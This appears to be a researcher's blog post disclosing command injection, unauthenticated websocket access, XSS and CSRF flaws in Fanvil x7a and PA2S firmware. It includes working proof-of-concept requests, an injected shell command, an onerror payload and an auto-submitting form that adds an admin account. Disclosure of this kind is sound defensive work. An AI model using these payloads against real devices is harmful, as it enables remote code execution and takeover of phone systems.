Home / Blog / Fanvil x7a & PA2S Vulnerability Disclosure

Fanvil x7a & PA2S Vulnerability Disclosure

Jul 19, 2024

Websocket Command Injection (CVE-2025-*****)

Proof of Concept:

Websocket Init Request:

GET /Ping HTTP/1.1
Host: FANVIL-HOST
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive, Upgrade
Cookie: auth=1a64000a000273ff; CUR_LANG=en; CUR_LANGCLICK=true; keepOnLine=true
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

Websocket Init Response:

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade

Command Injection Websocket Communication:

1.1.1.1; touch /sdcard/pwn
Ping 1.1.1.1; touch /sdcard/pwn failed

Terminal Log:

:/Alarms
Android
DCIM
Debug
Download
Movies
Music
Notifications
Pictures
Podcasts
Records
Ringtones
Secure
pwn


Mitre Reference:

Vulnerability Type: Command Injection
Vendor of Product: Fanvil
Affected Product Code Base: Fanvil x7a Android Phone 2.6.0.1182
Fanvil PA2S SIP Gateway 2.12.44.9
Affected Component: Management Portal Ping Tool
Description: The management portal’s diagnostic ping tool of Fanvil x7a firmware version 2.6.0.1182 & PA2S firmware version 2.12.44.9 does not handle user supplied input securely. The lack of secure user input handling allows any unauthenticated attacker to inject commands and run code in the underlying Android operating system.
Attack Vectors: Remote unauthenticated attacker can run arbitrary shell commands by sending a specially crafted websocket request to the diagnostic ping tool.
Attack Type: Remote
Impact Code execution: true
Impact Escalation of Privileges: true
Impact Information Disclosure: true


Websocket Broken Access Control (CVE-2025-*****)

Proof of Concept

Websocket Init Request:

GET /log HTTP/1.1
Host: FANVIL-X7Z
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive, Upgrade
Cookie: auth=1a64000a000273ff; CUR_LANG=en; CUR_LANGCLICK=true; keepOnLine=true
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

Websocket Init Response:

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade

Unauthenticated Log Query Websocket Communication:

via = [SIP/2.0/UDP FANVIL-HOST:5060]
Use dialog local ctt[<sip:9201@FANVIL-HOST:5060>]
pfmGetMwiByLine: Mwi: line=13, oldMsg=0, newMsg=0
pfmGetMwiByLine: Mwi: line=14, oldMsg=0, newMsg=0
Transaction use p2p [FANVIL-HOST:5060]
send REGISTER message!
Response in authorization |9fed49ad90fc0560426ac4e8a583dab0|
transaction id=[3102]!


Mitre Reference:

Vulnerability Type: Incorrect Access Control
Vendor of Product: Fanvil
Affected Product Code Base: Fanvil x7a Android Phone 2.6.0.1182
Fanvil PA2S SIP Gateway 2.12.44.9
Affected Component: Management Portal’s Websocket Authentication Handler
Description: The websocket handler of Fanvil x7a firmware version 2.6.0.1182 & PA2S firmware version 2.12.44.9 does not enforce proper authentication restrictions against sessionless users. The lack of restrictions grants anyone the ability to view any device resources such as operational logs or perform diagnostic requests.
Attack Vectors: Remote unauthenticated attacker can access device resources through websocket connections without user credentials.
Attack Type: Remote
Impact Code execution: false
Impact Escalation of Privileges: true
Impact Information Disclosure: true


Cross-Site Scripting (CVE-2025-*****)

Proof of Concept

Document Object Model:

<div class="content">
	<div class="navbar">
		<div class="label_f">
        	<span id="XSTR_WEB_DEVICELOG" class="block">Device Log</span>
            <img src="help.png" id="fv.note.deviceLog" class="help-img" alt="help">
            <div style="display:inline-block; float:right" class="block">
                <input type="button" value="Save" id="save" lang="XSTR_OPT_SAVE" style=" float:right; width:100px; margin-bottom:10px;" class="lit_btninput width8rem">
                <input type="button" value="Clear" id="clear" lang="XSTR_OPT_CLEAR" style="float:right; width:100px; margin-right:20px;" class="lit_btninput width8rem">
                <input type="button" value="stop" id="stop" lang="XSTR_WEB_STOP" style="float:right; width:100px; margin-right:20px;" class="lit_btninput width8rem">
                <input type="button" value="Start" id="start" lang="XSTR_LBL_START" style="float:right; width:100px; margin-right:20px;" class="lit_btninput width8rem" disabled="">
            </div>
        </div>
        	<div class="socket_body height30rem f16" id="soc">
 	
 operating information.<br>client[0] ip=[10.0.100.26] nonce=[1a64000a000273ff]<br>client[1] ip=[10.0.100.26] nonce=[1a64000a00028775]<br>client[2] ip=[] nonce=[]<br>client[0] ip=[10.0.100.26] nonce=[1a64000a000273ff]<br>client[1] ip=[10.0.100.26] nonce=[1a64000a00028779]<br>client[2] ip=[] nonce=[]<br>sipHsDbBackupCheck!<br>onTimeSntpServerGet: remote failed.<br>No module care event VCORE_TMSET_EVENT.<br><br>file [/sdcard/Ringtones/<img src=1 onerror=alert(1)>.wav] size is 0
</div>


Mitre Reference:

Vulnerability Type: Cross-Site Scripting
Vendor of Product: Fanvil
Affected Product Code Base: Fanvil x7a Android Phone 2.6.0.1182
Fanvil PA2S SIP Gateway 2.12.44.9
Affected Component: Management Portal’s Device Log
Description: The device log component of Fanvil x7a firmware version 2.6.0.1182 & PA2S firmware version 2.12.44.9 does not properly sanitize or encode reflected user supplied data. The lack of sanitization allows for the injection of HTML which can be used to execute malicious JavaScript code on any target browser which renders the device log component.
Attack Vectors: Remote unauthenticated attacker can send a specially crafted request which will inject JavaScript code into the management portal’s log tool.
Attack Type: Remote
Impact Code execution: false
Impact Escalation of Privileges: true
Impact Information Disclosure: true


Cross-Site Request Forgery (CVE-2025-*****):

Proof of Concept

Cross-Site Request Forgery Payload:

<html>
  <body>
    <form action="http://FANVIL-HOST/profile.htm" method="POST">
      <input type="hidden" name="ACN&#95;UserName" value="test" />
      <input type="hidden" name="ACN&#95;UserPasswd" value="&#36;EP&#94;&#37;39&#93;UGFzc3dvcmQxIQ&#61;&#61;" />
      <input type="hidden" name="ACN&#95;UserPasswdConfirm" value="&#36;EP&#94;&#37;39&#93;UGFzc3dvcmQxIQ&#61;&#61;" />
      <input type="hidden" name="ACN&#95;UserLevel" value="10" />
      <input type="hidden" name="ReturnPage" value="&#47;profile&#46;htm" />
      <input type="hidden" name="DefaultAdd" value="Add&#32;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


Mitre Reference:

Vulnerability Type: Cross-Site Request Forgery
Vendor of Product: Fanvil
Affected Product Code Base: Fanvil x7a Android Phone 2.6.0.1182
Fanvil PA2S SIP Gateway 2.12.44.9
Affected Component: Management Portal’s Device Log
Description: The request handler of Fanvil x7a firmware version 2.6.0.1182 & PA2S firmware version 2.12.44.9 does not enforce any cross-origin resource protection for any state-changing request performed against the applications. Due to the lack of protection, cross-origin boundary can be completely bypassed, allowing for Cross-Site Request Forgery Attacks against any endpoint.
Attack Vectors: Remote unauthenticated attacker, who has coerced an administrator user into viewing an attacker owned site, usually through normal “Websurfing” activity or shared links, can perform any request against the application using the authenticated administrator user session.
Attack Type: Remote
Impact Code execution: false
Impact Escalation of Privileges: true
Impact Information Disclosure: true


Timeline:

19/07/24 - initial contact disclosure